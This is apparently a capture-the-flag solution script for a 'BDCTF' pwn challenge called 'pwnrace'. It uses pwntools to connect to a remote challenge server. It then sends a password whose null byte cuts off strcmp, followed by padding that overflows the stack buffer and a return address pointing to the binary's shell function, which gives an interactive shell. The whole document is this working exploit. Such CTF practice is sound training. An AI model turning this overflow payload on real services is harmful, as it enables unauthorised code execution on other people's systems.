BDCTF - pwnrace

from pwn import *

context.log_level = 'debug'
context.terminal = ['urxvtc', '-e', 'sh', '-c']
context.arch = 'amd64'
#context.arch = 'i386'
ip = "159.223.101.241"
port = 31337
p = remote(ip, port)

file_name = "./pwnrace"
libc_name = "pwnrace"
#p = process(file_name)
e = ELF(file_name)
#libc = ELF(libc_name)

def slog(name, addr): return success(": ".join([name, hex(addr)]))


payload = b"hAcK_Th3_Pl@n3t"
payload += b'\x00'
payload += b"A"*(0x100 - len(payload) + 0x8 )
payload += p64(0x000000000040101a)+p64(e.sym['shell'])
pause()

p.sendlineafter("\x1B[0;32mEnter Password:\n\x1B[0m", payload)
p.interactive()

strcmp 의 특성을 이용해 풀이하면 된다.